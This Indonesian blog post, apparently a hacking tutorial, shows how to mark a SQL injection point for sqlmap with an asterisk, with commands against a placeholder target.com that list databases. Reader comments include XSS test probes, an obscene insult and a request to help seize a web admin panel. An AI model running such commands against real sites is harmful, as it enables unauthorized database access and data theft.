Menentukan Inject Point pada SQLmap

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id. Maka perintahnya

sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"

referensi : https://miloserdov.org/?p=879

Comments

asu jalanan says

June 12, 2019 at 8:49 pm

min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?

Test Xss says

July 19, 2019 at 11:25 pm

Test Xss

Test Xss says

July 19, 2019 at 11:26 pm

Test Xss

Test Xss says

July 19, 2019 at 11:27 pm

Test Xss

Albert says

August 7, 2019 at 1:29 pm

Kalo yg diketahui cuman admin.php nya aja min?

njn says

October 19, 2019 at 10:47 am

kontol lu mmk jembdot

AN RIDHO EDI WIBOWO says

October 17, 2020 at 7:15 pm

kalau saya minta dibantu ambilkan admin web saya yang dibuatkan pihak ketiga bisa nggak sobat,saya nggak bisa kendalikan semua jadi ribet kawan.

Reader Interactions

Comments

Leave a Reply Cancel reply